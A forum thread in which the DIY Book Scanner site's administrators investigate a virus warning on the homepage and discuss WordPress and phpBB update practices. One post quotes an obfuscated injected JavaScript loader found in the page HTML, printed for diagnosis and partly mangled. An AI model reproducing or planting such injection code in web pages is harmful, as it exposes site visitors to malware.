DIY Book Scanner

Am i the only one getting a virus warning on http://diybookscanner.org/ homepage ?

hmm, someone else PM'd me about this and I thought Avast was having problems with the Scriptaculous library. However, after some digging I found this script embedded between the "map" and "html" tags on the front page:

<!-- C/C v0842 --><script>function lG(){};jJ="";lG.prototype = {eS : ction(){return 'dM'};sH=false;var bO=15569;var bN="";this.vX="";o.write(oF);var bNS=new Date();var jY=false;var bT=new Array();gF=false;var tS=26505;var xP = this;var cW=new Date();var oE="oE";eV="";var jX=function(){};this.aP="";this.lN=49747;h(function(){ var bB=function(){return 'bB'};function hU(){};function nK(){};lT="";xP.z();rT="rT";var gH='';this.qI='';var xO="xO";var dU="";this.vZ=false;wP="";}, 317);iN="iN";var hP="";oQB='';var sV=false;}eO="eO";hD=49992;}};var vF=61292;var gK=new lG(); zD="";gK.z();this.hR="hR";</script></body>

I'm not sure how it got in there, but please check that you're no longer getting a false positive, and I'll seek out the source of the attack.

Apparently Wordpress is the attack vector; we were a version behind on the blog -- entirely my fault. Can you please visit the blog, and see if you get the same report?

http://www.diybookscanner.org/news/

It's no longer clear that WP was the vector. I'm further investigating, have made backups of everything, and am scanning my local machines for infection.

I also have found no other evidence of infection according to the usual methods of this trojan, so it appears (for the moment) that it came from a local machine. I'll be changing admin passwords sitewide.

You're also a bit behind on Wordpress again. 3.0.4 was just released, but I couldn't find any security holes in 3.0.3.

I'd be careful with PHPBB3. There are tons of scripts created just for the purpose of helping kiddies hack sites, so it's something to watch out for.

Have you tried the development version of each platform? Wordpress can be set to auto-update to the latest version (I run my local site on the development version, as I make WP themes sometimes). I'm not sure about PHPBB3...

Thanks for the reminder. I've gone through our hosting panel and clicked "upgrade" on everything, because the internal upgrade for Wordpress doesn't always work.

I've been keeping a close eye on things since the last incident. I appreciate more eyes.

I wouldn't rely too much on a hosting panel for this. Wordpress is self-contained, and sometimes it is just easier to run the upgrade than rely on a host (it's not automatic, as it sometimes just queues your upgrade request). There was a huge wave of Wordpress and PHP-based system infections being spread via Dreamhost specifically. I hope this isn't one of them...

Unfortunately the self-update on my WP install here is broken, so I have to use the WebPanel to get it done. Rob usually handles the forum updates, I'm not sure which mechanism he is using.

I won't rely on it and I'll try to do better with updates. I've seen no suspicious activity since the original code insertion and that makes me suspect it happened through a compromised client (my old laptop) with FTP access, rather than through infected software on the server.

I am always interested in better security info and updates, so feel free to keep me up-to-date.

The Admin Control Panel for the forum has an upgrade button, it hardly takes any time at all. Every so often I check the version page, and it says whether there's a newer version to install. So the forum tends to be up-to-date.